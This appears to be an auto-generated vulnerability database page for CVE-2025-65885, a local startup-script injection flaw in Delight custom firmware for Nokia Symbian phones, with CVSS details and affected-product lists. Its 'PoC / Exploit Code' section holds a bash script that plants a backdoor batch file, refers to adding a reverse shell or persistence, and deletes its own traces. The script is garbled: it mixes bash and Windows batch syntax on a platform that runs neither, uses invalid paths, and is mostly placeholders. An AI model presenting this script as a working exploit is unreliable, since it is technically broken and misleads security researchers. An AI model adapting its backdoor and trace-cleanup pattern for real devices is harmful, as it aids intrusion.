Security Vulnerability Report
CVE-2025-65885 CVSS 5.1 MEDIUM

CVE-2025-65885

Published: 2025-12-26 15:15:47
Last Modified: 2026-01-09 20:55:05

Description

An issue was discovered in the Delight Custom Firmware (CFW) for Nokia Symbian Belle devices on Nokia 808 (Delight v1.8), Nokia N8 (Delight v6.7), Nokia E7 (Delight v1.3), Nokia C7 (Delight v6.7), Nokia 700 (Delight v1.2), Nokia 701 (Delight v1.1), Nokia 603 (Delight v1.0), Nokia 500 (Delight v1.2), Nokia E6 (Delight v1.0), Nokia Oro (Delight v1.0), and Vertu Constellation T (Delight v1.0) allowing local attackers to inject startup scripts via crafted .txt files in the :\Data directory.

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:symwld:delight_custom_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nokia:808_pureview:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:symwld:delight_custom_firmware:6.7:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nokia:c7:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:nokia:n8:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:symwld:delight_custom_firmware:1.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nokia:e7:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:symwld:delight_custom_firmware:1.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nokia:701:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:nokia:c6-01:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:symwld:delight_custom_firmware:1.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nokia:500:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:nokia:700:-:*:*:*:*:*:*:* - NOT VULNERABLE

Nokia 808 (Delight v1.8)
Nokia N8 (Delight v6.7)
Nokia E7 (Delight v1.3)
Nokia C7 (Delight v6.7)
Nokia 700 (Delight v1.2)
Nokia 701 (Delight v1.1)
Nokia 603 (Delight v1.0)
Nokia 500 (Delight v1.2)
Nokia E6 (Delight v1.0)
Nokia Oro (Delight v1.0)
Vertu Constellation T (Delight v1.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-65885 PoC - Startup Script Injection in Delight CFW
# Target: Nokia Symbian Belle devices with Delight Custom Firmware

# Create malicious startup script file
cat > ':\\Data\\startup_inject.txt' << 'EOF'
# Delight CFW Startup Script Injection PoC
# This script demonstrates the injection vulnerability

# Create a backdoor entry in autoexec.bat or equivalent
if exist C:\\sys\\bin\\autostart.exe (
    echo Backdoor already exists
) else (
    # Inject malicious code that would execute on startup
    echo @echo off > C:\\sys\\bin\\malicious.bat
    echo rem Injected by CVE-2025-65885 >> C:\\sys\\bin\\malicious.bat
    echo # Add reverse shell or persistence mechanism here >> C:\\sys\\bin\\malicious.bat
)

# Alternative: Direct command injection
# The system reads .txt files from :\Data and executes them
# An attacker can place commands that will run with elevated privileges

# Example payload structure:
# 1. Create file at :\Data\config.txt
# 2. Insert shell commands
# 3. Wait for system/service restart
# 4. Commands execute with system privileges

# Clean up traces
del startup_inject.txt
EOF

echo "PoC file created. When device restarts, malicious commands will execute."

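References

https://gist.github.com/symbuzzer/3315e88adc2bba0b6cc66d192b49546d (Third Party Advisory)
https://www.symwld.com/delight/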
